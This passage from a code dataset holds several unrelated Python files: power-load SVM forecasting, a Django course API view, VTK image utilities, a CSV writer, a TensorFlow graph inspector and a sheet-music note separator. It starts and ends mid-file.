sampleinminmax.transpose()[0])).transpose()\n        sample_predictnorm = ((np.array(sample_predict.T) - sampleinminmax.transpose()[0]) / (\n                sampleinminmax.transpose()[1] - sampleinminmax.transpose()[0])).transpose()\n\n        sample_temp = sampleinnorm - sample_predictnorm\n\n        # find the optimal (mu, sigma) parameters for the current date\n        predict_finalresult = MaxValue\n        current_best_i,current_best_j = 0,0\n        for mu_index in range(len(muList)):\n            for sigma_index in range(len(sigmaList)):\n                SIMMartrix = np.zeros([sample_temp.shape[0], sample_temp.shape[1]])\n                SIMCount = [0, ] * sample_temp.shape[1]\n\n                for row in range(sample_temp.shape[0]):\n                    for column in range(sample_temp.shape[1]):\n                        if np.exp(-(sample_temp[row][column] ** 2) / (2 * sigmaList[sigma_index] * sigmaList[sigma_index])) >= muList[mu_index]:\n                            SIMMartrix[row][column] = 1\n                            SIMCount[column] += 1\n                        else:\n                            SIMMartrix[row][column] = 0\n\n                SIMCount.pop()\n                SVM_X = []\n                SVM_y = []\n                MaxIndexCount = 0\n                for i in range(len(SIMCount)):\n                    if SIMCount[i] >= (max(SIMCount) - SIM_range):\n                        MaxIndexCount += 1\n                        SVM_X.append(\n                            [AverTemper[i], AverPress[i], AverSPress[i], LowTemper[i], HighTemper[i], LowPress[i],\n                             HighPress[i], history_1[i], history_2[i], history_3[i], history_4[i], history_5[i],\n                             history_6[i], history_7[i]])\n                        SVM_y.append(PowerLoadMax[i])\n\n                predict_result = algorithm_SVM(SVM_X,SVM_y,current_data)\n                if abs(predict_result - PowerLoadMax_real[date_index]) <= abs(predict_finalresult - PowerLoadMax_real[date_index]):\n                    predict_finalresult = predict_result\n                    current_best_i = mu_index\n                    current_best_j = sigma_index\n\n        # predict the current date with the previous date's optimal parameters\n        SIMMartrix = np.zeros([sample_temp.shape[0], sample_temp.shape[1]])\n        SIMCount = [0, ] * sample_temp.shape[1]\n\n        for row in range(sample_temp.shape[0]):\n            for column in range(sample_temp.shape[1]):\n                if np.exp(-(sample_temp[row][column] ** 2) / (2 * sigmaList[pre_best_j] * sigmaList[pre_best_j])) >= muList[pre_best_i]:\n                    SIMMartrix[row][column] = 1\n                    SIMCount[column] += 1\n                else:\n                    SIMMartrix[row][column] = 0\n\n        SIMCount.pop()\n        SVM_X = []\n        SVM_y = []\n        MaxIndexCount = 0\n        for i in range(len(SIMCount)):\n            if SIMCount[i] >= (max(SIMCount) - SIM_range):\n                MaxIndexCount += 1\n                SVM_X.append(\n                    [AverTemper[i], AverPress[i], AverSPress[i], LowTemper[i], HighTemper[i], LowPress[i],\n                     HighPress[i], history_1[i], history_2[i], history_3[i], history_4[i], history_5[i],\n                     history_6[i], history_7[i]])\n                SVM_y.append(PowerLoadMax[i])\n\n        current_predict_result = algorithm_SVM(SVM_X,SVM_y,current_data)\n\n        SVM_result.append(current_predict_result)\n        pre_best_i = current_best_i\n        pre_best_j = current_best_j\n\n    # compute MAPE / MASE\n    MAPE = CalMAPE(PowerLoadMax_real, SVM_result)\n    MASE = CalMASE(PowerLoadMax_real, SVM_result)\n    print(\"MAPE:\" + str(round(MAPE * 100,2)) + \"%\")\n    print(\"MASE:\" + str(round(MASE * 100, 2)) + \"%\")\n    return PredictList(date_predict, PowerLoadMax_real, SVM_result, MAPE)\n\ndef algorithm_SVM(X,y,test):\n    clf = svm.SVR(gamma='auto', C=75, epsilon=50)\n    clf.fit(X, y)\n    result = round(float(clf.predict(test)), 2)\n    return result\n\nif __name__ == '__main__':\n    start_date = [\"2007-1-1\",\"2007-2-1\",\"2007-3-1\",\"2007-4-1\",\"2007-5-1\",\"2007-6-1\",\"2007-7-1\",\"2007-8-1\",\"2007-9-1\",\"2007-10-1\",\"2007-11-1\",\"2007-12-1\"]\n    end_date = [\"2007-1-31\",\"2007-2-28\",\"2007-3-31\",\"2007-4-30\",\"2007-5-31\",\"2007-6-30\",\"2007-7-31\",\"2007-8-31\",\"2007-9-30\",\"2007-10-31\",\"2007-11-30\",\"2007-12-31\"]\n    for i in range(len(start_date)):\n        print(\"start:\" + start_date[i] + \"---end:\" + end_date[i])\n        Result = 
Predict_Main(start_date[i], end_date[i])\n    Result = Predict_Main()\n","sub_path":"ForcastingAlgorithm/SVM/Moudle.py","file_name":"Moudle.py","file_ext":"py","file_size_in_byte":13998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"139492148","text":"from rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom api import models\nfrom rest_framework.viewsets import GenericViewSet, ViewSetMixin, ModelViewSet\nfrom api.serializers.course import CourseSerializer, CourseDetailSerializer\nfrom api.auth.auth import TokenAuth\n\n\nclass CourseView(ModelViewSet):\n    def list(self, request, *args, **kwargs):\n\n        ret = {'code': 1000, 'data': None}\n\n        try:\n            queryset = models.Course.objects.all()\n            ser = CourseSerializer(instance=queryset, many=True)\n            ret[\"data\"] = ser.data\n        except Exception as e:\n            ret[\"code\"] = 1001\n            ret[\"data\"] = \"error:\" + str(e)\n\n        return Response(ret)\n\n    def retrieve(self, request, *args, **kwargs):\n        ret = {'code': 1000, 'data': None}\n        try:\n            pk = kwargs.get(\"pk\")\n            print(pk)\n            queryset = models.CourseDetail.objects.filter(course_id=pk).first()\n            ser = CourseDetailSerializer(instance=queryset, many=False)\n            ret[\"data\"] = ser.data\n        except Exception as e:\n            ret[\"code\"] = 1001\n            ret[\"data\"] = \"error:\" + str(e)\n\n        return Response(ret)\n","sub_path":"web_server/luffycity/api/views/course.py","file_name":"course.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"494839801","text":"from functools import reduce\n\nimport numpy as np\nimport pandas as pd\nimport vtk\nfrom vtk.util import numpy_support\nfrom vtk.util.numpy_support import vtk_to_numpy\nimport warnings\n\n\ndef read_vtp(input_file):\n    \"\"\" Read vtk poly data file and output vtkPolyData\n    :param input_file: path to vtkXMLPolyData (vtp) file\n    :return: vtkPolyData\n    \"\"\"\n    reader = vtk.vtkXMLPolyDataReader()\n    reader.SetFileName(input_file)\n    reader.Update()\n    return reader.GetOutput()\n\n\ndef read_vti(input_file):\n    \"\"\" Read vtk image data file and output vtkImageData\n    :param input_file: path to vtkImageData (vti) file\n    :return: vtkImageData\n    \"\"\"\n    reader = vtk.vtkXMLImageDataReader()\n    reader.SetFileName(input_file)\n    reader.Update()\n    return reader.GetOutput()\n\n\ndef write_vti(image, output_filename):\n    \"\"\" Write vtk image data to output vti file\n    :params:\n        image: vtkImageData to write\n        output_filename: path to output vti file to write\n    \"\"\"\n    writer = vtk.vtkXMLImageDataWriter()\n    writer.SetFileName(output_filename)\n    if vtk.VTK_MAJOR_VERSION <= 5:\n        writer.SetInputConnection(image.GetProducerPort())\n    else:\n        writer.SetInputData(image)\n    writer.Write()\n\n\ndef vti_to_numpy(vti_image, channel_names=None, dtype=np.float32, xyz_transpose=True):\n    \"\"\"\n    Create a numpy.ndarray from a vti image\n\n    :param vti_image: vtkImageData\n    :param channel_names: array columns you want to extract.\n        If `None` all channels will be extracted (Default)\n    :param dtype: type of array to return (default float32)\n    :param xyz_transpose: Transpose from z,y,x ordering to x,y,z ordering\n    :return: numpy.ndarray of shape:\n        (nx,ny,nz,n_channels) if xyz_transpose=True or\n        (nz,ny,nx,n_channels) if xyz_transpose=False\n    \"\"\"\n    nx, ny, nz = vti_image.GetDimensions()\n    point_data = vti_image.GetPointData()\n\n    if channel_names is None:\n        num_channels = point_data.GetNumberOfArrays()\n        channel_names = 
[point_data.GetArrayName(i) for i in range(num_channels)]\n\n    vtk_arrays = [point_data.GetArray(channel) for channel in channel_names]\n\n    image_channels_flat = [vtk_to_numpy(vtk_array) for vtk_array in vtk_arrays]\n\n    image_channels = [image_flat.reshape(nz, ny, nx) for image_flat in image_channels_flat]\n\n    if xyz_transpose:\n        image_channels = [image_zyx.transpose() for image_zyx in image_channels]\n\n    image_channels = np.stack(image_channels, axis=-1).astype(dtype)  # Last dimension is channel\n\n    return image_channels\n\n\ndef vti_to_numpy_multiple_channels(vti_image, channel_names, dtype=np.float32, xyz_transpose=True):\n    \"\"\"\n    Create a numpy.ndarray from a vti image\n\n    :param vti_image: vtkImageData\n    :param channel_names: array columns you want to extract.\n        If `None` all channels will be extracted (Default)\n    :param dtype: type of array to return (default float32)\n    :param xyz_transpose: Transpose from z,y,x ordering to x,y,z ordering\n    :return: numpy.ndarray of shape:\n        (nx,ny,nz,n_channels) if xyz_transpose=True or\n        (nz,ny,nx,n_channels) if xyz_transpose=False\n    \"\"\"\n    warnings.warn('vti_to_numpy_multiple_channels is deprecated; use vti_to_numpy(...).',\n                  DeprecationWarning)\n\n    return vti_to_numpy(vti_image=vti_image, channel_names=channel_names,\n                        dtype=dtype, xyz_transpose=xyz_transpose)\n\n\ndef numpy_to_vti(array, spacing, origin, dimensions, array_name, xyz_transpose=True):\n    \"\"\"\n    Convert numpy array to a vti image (vtkImageData)\n    :param array: numpy.ndarray\n    :param spacing: Voxel spacing\n    :param origin: image origin\n    :param dimensions: number of voxels in each dimension (nx,ny,nz)\n    :param array_name: Name to assign the array in the vti image\n    :param xyz_transpose: Transpose from x,y,z ordering to z,y,x ordering. Note VTK uses z,y,x\n    :return: vtkImageData\n    \"\"\"\n    image = create_empty_vtk_image_data(spacing, origin, dimensions)\n    vtk_array = numpy_support.numpy_to_vtk(array.transpose().flatten() if xyz_transpose else array.flatten())\n    vtk_array.SetName(array_name)\n    image.GetPointData().AddArray(vtk_array)\n    return image\n\n\ndef numpy_to_vti_multiple_channels(array, spacing, origin, dimensions, array_names, channels_last=True,\n                                   xyz_transpose=True, xyz_dimensions=(0, 1, 2)):\n    \"\"\"\n    Convert numpy array to a vti image (vtkImageData)\n\n    Default usage assumes that the array is ordered [x,y,z,channel]\n\n    numpy_to_vti_multiple_channels(np_image,(3,3,3), (0,0,0), (50,100,10), ['TwoSix', 'MLEM'])\n\n    Another example where the channels are first\n\n    numpy_to_vti_multiple_channels(np_image,(3,3,3), (0,0,0), (50,100,10), ['TwoSix', 'MLEM'],channels_last=False)\n\n    Array is already ordered zyx:\n    numpy_to_vti_multiple_channels(np_image,(3,3,3), (0,0,0), (50,100,10), ['TwoSix', 'MLEM'],\n                                   xyz_transpose=False)\n\n    :param array: numpy.ndarray\n    :param spacing: Voxel spacing\n    :param origin: image origin\n    :param dimensions: number of voxels in each dimension (nx,ny,nz)\n    :param array_names: Names to assign the arrays in the vti image\n    :param channels_last: True if the channels are last, else assumes channels are first. Default is last (True)\n    :param xyz_transpose: Transpose from x,y,z ordering to z,y,x ordering. Note VTK uses z,y,x\n    :param xyz_dimensions: Dimensions of the x, y, & z values. 
Default is (0,1,2).\n    :return: vtkImageData\n    \"\"\"\n    image = create_empty_vtk_image_data(spacing, origin, dimensions)\n\n    array_dimensions = range(len(array.shape))\n    xdim, ydim, zdim = xyz_dimensions\n\n    if channels_last:\n        last_dim = len(array.shape) - 1\n\n        # Sort the dimensions so the channel is first\n        channel_first_dims = sorted(array_dimensions, key=lambda dim: dim if dim != last_dim else np.NINF)\n\n        # Transpose so channel is first. Easier for looping over channels\n        array = array.transpose(channel_first_dims)\n\n        # Add one to the x,y,z dimension because they were shifted down in the channel transpose\n        xdim, ydim, zdim = [dim + 1 for dim in xyz_dimensions]\n\n    if xyz_transpose:\n        array = array.transpose(0, zdim, ydim, xdim)  # [channel,z,y,x]\n\n    for name, channel_array in zip(array_names, array):\n        # flatten to 1-D (and make contiguous); numpy_to_vtk rejects arrays with more than 2 dimensions\n        vtk_array = numpy_support.numpy_to_vtk(channel_array.flatten())\n        vtk_array.SetName(name)\n        image.GetPointData().AddArray(vtk_array)\n\n    return image\n\n\ndef create_empty_vtk_image_data(spacing, origin, dimensions):\n    \"\"\" Create a vti image data of doubles\n    :params:\n        spacing: tuple of spacing for x,y,z\n        origin: tuple of x,y,z origin\n        dimensions: tuple of number of voxels in nx,ny,nz\n    :return:\n        vtk image data\n    \"\"\"\n    image = vtk.vtkImageData()\n    image.SetSpacing(*spacing)\n    image.SetOrigin(*origin)\n    image.SetDimensions(*dimensions)\n    return image\n\n\ndef real_to_structured_coordinates(image, xmin, xmax, ymin, ymax, zmin, zmax, as_slice=True):\n    \"\"\"\n    Generate a tuple of slices in structured image coordinates from\n    real extent locations. Structured coordinates are the indices of an image\n\n    extent_columns = ['xmin', 'xmax', 'ymin', 'ymax', 'zmin', 'zmax']\n\n    crop_coords = real_to_structured_coordinates(img,*row[extent_columns])\n    img_np = vti_to_numpy(img)\n    cropped_voxels = img_np[crop_coords]\n\n    ... 
or for labeling an image\n\n    truth_image_np = np.zeros_like(image_np)\n    truth_image_np[crop_coords] = 1\n\n    :param image: vti image\n    :param xmin: minimum x extent in real coordinate space\n    :param xmax: maximum x extent in real coordinate space\n    :param ymin: minimum y extent in real coordinate space\n    :param ymax: maximum y extent in real coordinate space\n    :param zmin: minimum z extent in real coordinate space\n    :param zmax: maximum z extent in real coordinate space\n    :param as_slice: return slice objects if True, else a list of (min, max) tuple extents\n    :return: (slice(imin, imax), slice(jmin, jmax), slice(kmin, kmax))\n    \"\"\"\n    min_voxel_ijk = [int()] * 3\n    max_voxel_ijk = [int()] * 3\n    pcoords = [float()] * 3\n\n    image.ComputeStructuredCoordinates([xmin, ymin, zmin], min_voxel_ijk, pcoords)\n    image.ComputeStructuredCoordinates([xmax, ymax, zmax], max_voxel_ijk, pcoords)\n\n    # We don't want a zero index starting voxel coordinate\n    min_voxel_ijk = [max((i, 1)) for i in min_voxel_ijk]\n\n    # Let's create a slice region on each dimension so we can crop higher dimensional blocks :)\n    coords_slices = [(imin, imax) for imin, imax in zip(min_voxel_ijk, max_voxel_ijk)]\n\n    if as_slice:  # give me a slice bro!\n        coords_slices = [slice(*extents) for extents in coords_slices]\n\n    return tuple(coords_slices)\n\n\ndef real_to_structured_coordinates2(image, xmin, xmax, ymin, ymax, zmin, zmax):\n    \"\"\"\n    Generate a tuple of slices in structured image coordinates from\n    real extent locations.\n\n    extent_columns = ['xmin', 'xmax', 'ymin', 'ymax', 'zmin', 'zmax']\n\n    crop_coords = real_to_structured_coordinates(img,*row[extent_columns])\n    img_np = vti_to_numpy(img)\n    cropped_voxels = img_np[crop_coords]\n\n    ... or for labeling an image\n\n    truth_image_np = np.zeros_like(image_np)\n    truth_image_np[crop_coords] = 1\n\n    :param image: vti image\n    :param xmin xmax ymin ymax zmin zmax:\n    :return: (slice(imin, imax), slice(jmin, jmax), slice(kmin, kmax))\n    \"\"\"\n\n    warnings.warn('real_to_structured_coordinates2 is deprecated; use real_to_structured_coordinates(...).',\n                  DeprecationWarning)\n\n    return real_to_structured_coordinates(image=image,\n                                          xmin=xmin, xmax=xmax,\n                                          ymin=ymin, ymax=ymax,\n                                          zmin=zmin, zmax=zmax,\n                                          as_slice=True)\n\n\ndef extract_volume(image, xmin, xmax, ymin, ymax, zmin, zmax):\n    \"\"\"\n    Extract a volume from a vtkImageData\n    :param image:\n    :param xmin xmax ymin ymax zmin zmax:\n    :return: Extracted volume vtkImageData\n    \"\"\"\n    min_voxel_ijk = [int()] * 3\n    max_voxel_ijk = [int()] * 3\n    pcoords = [float()] * 3\n\n    image.ComputeStructuredCoordinates([xmin, ymin, zmin], min_voxel_ijk, pcoords)\n    image.ComputeStructuredCoordinates([xmax, ymax, zmax], max_voxel_ijk, pcoords)\n\n    def if_zero(value):\n        if value == 0:\n            return value\n        else:\n            return value + 1\n\n    start_voxel_ijk = list(map(if_zero, min_voxel_ijk))\n    extents_ijk = list(reduce(lambda i, j: i + j, list(zip(start_voxel_ijk, max_voxel_ijk))))\n\n    vtk_extract_voi = vtk.vtkExtractVOI()\n    if vtk.vtkVersion.GetVTKMajorVersion() < 6:\n        vtk_extract_voi.SetInput(image)\n    else:\n        vtk_extract_voi.SetInputData(image)\n\n    vtk_extract_voi.SetVOI(*extents_ijk)\n    vtk_extract_voi.Update()\n\n    return vtk_extract_voi.GetOutput()\n\n\ndef extractVOI(image, b0, b1, b2, b3, b4, b5):\n    warnings.warn('extractVOI is deprecated; use extract_volume(...).',\n                  DeprecationWarning)\n\n    return extract_volume(image=image, xmin=b0, xmax=b1, ymin=b2, ymax=b3, zmin=b4, zmax=b5)\n\n\ndef does_intersect_np(row1, row2):\n    \"\"\" xmin, xmax, ymin, ymax, zmin, zmax\n          0     1    
2 3 4 5\n \"\"\"\n intersect_volume = reduce(lambda i, j: i * j \\\n , [max(min(*vmin_vmax[1]) - max(*vmin_vmax[0]), 0) for vmin_vmax in\n [((row2[0], row1[0]), (row2[1], row1[1]))\n , ((row2[2], row1[2]), (row2[3], row1[3]))\n , ((row2[4], row1[4]), (row2[5], row1[5]))]])\n return intersect_volume > 0\n\n\ndef percent_volume_of_intersection_np(gridrow, truthrow):\n \"\"\" xmin, xmax, ymin, ymax, zmin, zmax\n 0 1 2 3 4 5\n \"\"\"\n total_volume = reduce(lambda i, j: i * j\n , [vmin_vmax1[1] - vmin_vmax1[0] for vmin_vmax1 in [(gridrow[0], gridrow[1])\n , (gridrow[2], gridrow[3])\n , (gridrow[4], gridrow[5])]])\n intersect_volume = reduce(lambda i, j: i * j\n , [max(min(*vmin_vmax2[1]) - max(*vmin_vmax2[0]), 0) for vmin_vmax2 in\n [((truthrow[0], gridrow[0]), (truthrow[1], gridrow[1]))\n , ((truthrow[2], gridrow[2]), (truthrow[3], gridrow[3]))\n , ((truthrow[4], gridrow[4]), (truthrow[5], gridrow[5]))]])\n return intersect_volume / total_volume\n\n\ndef vtp_points_to_df(input_file):\n vtp = read_vtp(input_file)\n points = []\n for i in range(vtp.GetNumberOfPoints()):\n points.append(dict(list(zip(['x', 'y', 'z'], vtp.GetPoint(i)))))\n df = pd.DataFrame(points)\n df.sort_values(['x', 'y', 'z'], inplace=True)\n return df\n\n\ndef vti_to_df(input_file):\n vtk_image_data = read_vti(input_file)\n point_data = vtk_image_data.GetPointData()\n field_data = vtk_image_data.GetFieldData()\n\n data_dict = {}\n # Add field data\n for i in range(field_data.GetNumberOfArrays()):\n array_name = field_data.GetArrayName(i)\n array = field_data.GetArray(array_name)\n if array is None:\n array = field_data.GetAbstractArray(i)\n data_dict[array_name] = list(map(array.GetValue, range(array.GetNumberOfTuples())))\n\n # Add point data\n for i in range(point_data.GetNumberOfArrays()):\n array_name = point_data.GetArrayName(i)\n array = point_data.GetArray(array_name)\n if array is None:\n continue\n data_dict[array_name] = list(map(array.GetValue, range(array.GetNumberOfTuples())))\n\n num_rows = max(list(map(len, iter(data_dict.values()))))\n data_dict = {k: v + [None] * (num_rows - len(v)) for (k, v) in data_dict.items()}\n\n return pd.DataFrame(data_dict)\n\n\ndef vtp_to_df(input_file):\n poly_data = read_vtp(input_file)\n field_data = poly_data.GetFieldData()\n data_dict = {}\n # Add field data\n for i in range(field_data.GetNumberOfArrays()):\n array_name = field_data.GetArrayName(i)\n array = field_data.GetArray(array_name)\n if array is None:\n array = field_data.GetAbstractArray(i)\n values_list = list(map(array.GetValue, range(array.GetNumberOfTuples())))\n data_dict[array_name] = values_list\n\n num_rows = max(list(map(len, iter(data_dict.values()))))\n data_dict = {k: v + [None] * (num_rows - len(v)) for (k, v) in data_dict.items()}\n return pd.DataFrame(data_dict)\n\n\ndef df_to_vtp(df, output_path):\n append = vtk.vtkAppendPolyData()\n\n for index, row in df.iterrows():\n cube = vtk.vtkCubeSource()\n xcom = 0.5 * (row.xmax + row.xmin)\n ycom = 0.5 * (row.ymax + row.ymin)\n zcom = 0.5 * (row.zmax + row.zmin)\n xsize = row.xmax - row.xmin\n ysize = row.ymax - row.ymin\n zsize = row.zmax - row.zmin\n cube.SetCenter(xcom, ycom, zcom)\n cube.SetXLength(xsize)\n cube.SetYLength(ysize)\n cube.SetZLength(zsize)\n cube.Update()\n\n append.AddInput(cube.GetOutput())\n\n append.Update()\n\n writer = vtk.vtkXMLPolyDataWriter()\n writer.SetInput(append.GetOutput())\n writer.SetFileName(output_path)\n writer.Write()\n\n\ndef df_to_vti(df, column, output_filename, resample_factor=1\n , x_column='x'\n , y_column='y'\n 
, z_column='z'):\n \"\"\" Create a vti file from a data frame based on a column/s\n :params:\n image: vtkImageData to write\n output_filename: path to output vti file to write\n \"\"\"\n\n # Get the unique x,y,z values\n xs, ys, zs = [sorted(df[col].unique().tolist()) for col in [x_column, y_column, z_column]]\n\n # Get the number in each dimension\n nx, ny, nz = list(map(len, [xs, ys, zs]))\n\n resample_df = get_resample_index_lists(resample_factor, xs, ys, zs)\n volume_size = xs[1] - xs[0]\n resample_volume_size = (xs[1] - xs[0]) * 1.0 / resample_factor\n\n spacing = (resample_volume_size, resample_volume_size, resample_volume_size)\n origin = [i - volume_size / 2.0 for i in [xs[0], ys[0], zs[0]]]\n dimensions = [resample_factor * n for n in [nx, ny, nz]]\n\n image = create_empty_vtk_image_data(spacing, origin, dimensions)\n dims = image.GetDimensions()\n\n # Handle the case if only one column is passed in\n if isinstance(column, str):\n filter_columns = [column]\n else:\n filter_columns = column\n\n filter_image_data = {}\n for filter_name in filter_columns:\n filter_image_data[filter_name] = vtk.vtkDoubleArray()\n filter_image_data[filter_name].SetName(filter_name)\n filter_image_data[filter_name].SetNumberOfComponents(1)\n filter_image_data[filter_name].SetNumberOfTuples(image.GetNumberOfPoints())\n\n # first sort\n df_sorted = df.sort_values([x_column, y_column, z_column])\n df_sorted.dropna(subset=filter_columns, inplace=True)\n\n # convert to list\n filter_voxel_values_list = df_sorted[filter_columns].values.tolist()\n\n # for indexing in vti\n ixyz = 0\n # go through entire list\n for filter_voxel_values in filter_voxel_values_list:\n # print 'filter_voxel_values:',filter_voxel_values\n for iixyz in resample_df[resample_df.ixyz == ixyz]['iixyz_list'].values[0]:\n # they are in order\n for ifilter, filter_name in enumerate(filter_columns):\n filter_image_data[filter_name].SetValue(iixyz, filter_voxel_values[ifilter])\n ixyz += 1\n\n for filter_name in filter_columns:\n image.GetPointData().AddArray(filter_image_data[filter_name])\n\n # Write the image\n write_vti(image, output_filename)\n\n\ndef get_resample_index_lists(resample_factor\n , xs, ys, zs):\n xs.sort()\n ys.sort()\n zs.sort()\n\n nxrs = resample_factor * len(xs)\n nyrs = resample_factor * len(ys)\n nzrs = resample_factor * len(zs)\n\n ixyz = 0\n ixyz_iixyz_dict_list = []\n # for iz,z in enumerate(zs):\n for ix, x in enumerate(xs):\n for iy, y in enumerate(ys):\n # for ix,x in enumerate(xs):\n for iz, z in enumerate(zs):\n ixyz_iixyz_dict = {'ixyz': int(ixyz), 'iixyz_list': []}\n # resampling loops\n for iiz in range(iz * resample_factor, iz * resample_factor + resample_factor):\n for iiy in range(iy * resample_factor, iy * resample_factor + resample_factor):\n for iix in range(ix * resample_factor, ix * resample_factor + resample_factor):\n iixyz = iix + iiy * nxrs + iiz * nxrs * nyrs\n ixyz_iixyz_dict['iixyz_list'].append(iixyz)\n ixyz_iixyz_dict_list.append(ixyz_iixyz_dict)\n ixyz += 1\n return pd.DataFrame(ixyz_iixyz_dict_list)\n","sub_path":"vtk_util.py","file_name":"vtk_util.py","file_ext":"py","file_size_in_byte":19043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"417021486","text":"#!/usr/bin/env python\nimport sys\nfrom datetime import datetime, date\n\n__all__ = ['rec2csv_neat']\n\ndef rec2csv_neat(rec, f, formatd={}, delimiter=','):\n \"\"\"rec2csv_neat is a neat version of mlab.rec2csv.\n rec: recarray to save.\n formatd: dict of formats for each 
field, whose values may be a format str, function, etc. For the fields 'datetime', 'date' and 'time', a '%Y%m%d...' style format can be used\"\n    \"\"\"\n    dtp = rec.dtype\n    fieldnames = dtp.names\n    formaters = {}\n    for fn in fieldnames:\n        if fn in formatd:\n            the_fmt = formatd[fn]\n            if isinstance(the_fmt, (str, unicode)):\n                if isinstance(rec[fn][0], (date, datetime)) :\n                    # bind the format now via a default argument; a plain closure over formatd[fn]\n                    # would see only the last fn once the loop has finished\n                    formaters[fn] = lambda dt, fmt=the_fmt: dt.strftime(fmt)\n                else:\n                    formaters[fn] = lambda val, fmt=the_fmt: fmt % (val, )\n            elif callable(the_fmt):\n                formaters[fn] = the_fmt\n            else:\n                sys.stderr.write('Warning: given formatter for field %s : %s is not callable. Not using.\\n' % (fn, the_fmt))\n                formaters[fn] = str\n        else:\n            formaters[fn] = str\n    if isinstance(f, (str, unicode)):\n        f = open(f, 'w')\n    f.write(delimiter.join(fieldnames))\n    f.write('\\n')\n    for i in range(len(rec)):\n        try:\n            to_write = [formaters[fn](rec[fn][i]) for fn in fieldnames]\n            final_str = delimiter.join(to_write)\n            f.write(final_str)\n            f.write('\\n')\n            \n        except Exception as e:\n            sys.stderr.write('%s\\n' % e)\n\n#if __name__ == \"__main__\":\n#    from matplotlib import mlab\n#    rec = mlab.csv2rec('./test.csv')\n#    print rec\n#    rec2csv_neat(rec, './testout.csv', formatd={'datetime':\"%Y%m%d\", 'lc':'%.3f','std':'%.9f'})\n","sub_path":"metlib/io/rec2csv_neat.py","file_name":"rec2csv_neat.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"123160720","text":"import tensorflow as tf\nimport sys\nimport json\n\ndef usage(argv):\n    print(\"{} <frozen_graph.pb>\".format(argv[0]))\n\nif __name__ == \"__main__\":\n    try:\n        path = sys.argv[1]\n    except IndexError:\n        usage(sys.argv)\n        sys.exit(1)\n\n    # Ref: https://stackoverflow.com/questions/43517959/given-a-tensor-flow-model-graph-how-to-find-the-input-node-and-output-node-name\n    gf = tf.GraphDef()\n    with open(path, 'rb') as fin:\n        gf.ParseFromString(fin.read())\n\n    nodes = [n.name + '=>' + n.op for n in gf.node]\n    nodes = json.dumps(nodes, indent=4)\n\n    # note the trailing commas: these must be tuples, or `in` would do a substring test\n    nodes_io = [n.name + '=>' + n.op for n in gf.node if n.op in ('Placeholder',) or n.name in ('embeddings',)]\n    nodes_io = json.dumps(nodes_io, indent=4)\n\n    print(\"All nodes:\")\n    print(nodes)\n\n    print(\"IO nodes:\")\n    print(nodes_io)\n\n    # Another way: first import the model to the current graph,\n    # Then inspect the ops and tensors from the current graph\n    # Ref: https://www.tensorflow.org/guide/graphs\n    tf.import_graph_def(gf, name=\"\")\n    g = tf.get_default_graph()\n    ops=g.get_operations()\n    ops=[op.name for op in ops]\n    ops=json.dumps(ops, indent=4)\n    print(\"Ops:\")\n    print(ops)","sub_path":"misc/inspect_model.py","file_name":"inspect_model.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"224040433","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 18 12:24:34 2021\n\n@author: fritz\n\"\"\"\n\n'''IMPORTANT: directories beginning with '_' will not be processed'''\n\nfrom PIL import Image\nimport numpy as np\nimport sys, os, shutil\nimport Union_and_Find\n\nthresh = 140\nfn = lambda x : 255 if x > thresh else 0\n\namount_black_pixel_deviation = 1.4\ntresh_delete_noise_of_marked_cols = 0.00\nseperate_width = 1/10  # fraction of the line width\n\ndir_to_save = \"separated_notes\"\ndir_to_open = \"groups_to_separate\"\n\ndef main(): \n    for dirName, subdirList, fileList in os.walk(dir_to_open):\n        split = dirName.split('/')\n        \n        if len(split) > 2:\n            \n            test_name = split[1]\n            
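# dirName has the form groups_to_separate/<test_name>/<line_name> (cf. dir_to_open above), so split('/') yields those parts at indices 1 and 2\n            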
line_name = split[2]            \n            out_dir = \"{}/{}/{}\".format(dir_to_save, test_name, line_name)\n            \n            for fName in fileList:\n                fName = fName.strip()\n\n                if test_name[0] == '_':\n                    continue\n                \n                print(dirName, fName)\n                img = Image.open(\"{}/{}\".format(dirName,fName))\n                np_img = np.asarray(img)\n                img = img.convert('L').point(fn, mode='1')\n\n                len_width = np_img.shape[1]\n                len_height = np_img.shape[0]\n                \n                global tresh_pixel_to_separate\n                tresh_pixel_to_separate = int (len_width * seperate_width)\n                \n                col_index = 0\n                counter = 0 \n                number_of_cols = 10\n                \n                amount_black_pixel_array = np.zeros(number_of_cols, dtype=int)\n                \n                while amount_black_pixel_array[number_of_cols-1] == 0:\n                    col = np_img[:, col_index].tolist()\n                    spaces_between_lines, amount_black_pixel = calc_spaces_between_lines(col)\n                    \n                    if is_matching_pattern(spaces_between_lines):\n                        amount_black_pixel_array[counter] = amount_black_pixel\n                        counter += 1 \n                    \n                    col_index += 1\n                \n\n                amount_black_pixel = int(amount_black_pixel_array.mean())\n                \n                marked_cols = mark_col_true_if_is_on_a_note(amount_black_pixel, np_img, len_width, len_height)\n\n                #distribution = calc_distribution_of_amount_of_related_black_pixel(marked_cols)\n                #marked_cols = delete_noise_of_marked_cols(marked_cols, distribution)\n                \n                notes = create_list_of_notes(marked_cols)\n\n                convert_notes_to_images(notes, out_dir, fName, np_img)\n\n\ndef calc_spaces_between_lines(col):\n    is_between_to_lines = False\n    is_prev_black = False\n    \n    spaces_between_lines = []\n    \n    pixel_between_lines = 0\n    amount_black_pixel = 0\n    \n    for pixel in col:\n        if is_between_to_lines and isWhite(pixel):\n            pixel_between_lines += 1\n        \n        elif is_between_to_lines and isBlack(pixel) and not is_prev_black:\n            amount_black_pixel += 1\n            spaces_between_lines.append(pixel_between_lines)\n            is_prev_black = True\n            is_between_to_lines = False\n            pixel_between_lines = 0\n        \n        elif is_prev_black and isWhite(pixel):\n            is_prev_black = False\n            is_between_to_lines = True   \n            \n            pixel_between_lines += 1\n            \n        elif isBlack(pixel):\n            is_prev_black = True\n            amount_black_pixel += 1\n            \n    return spaces_between_lines, 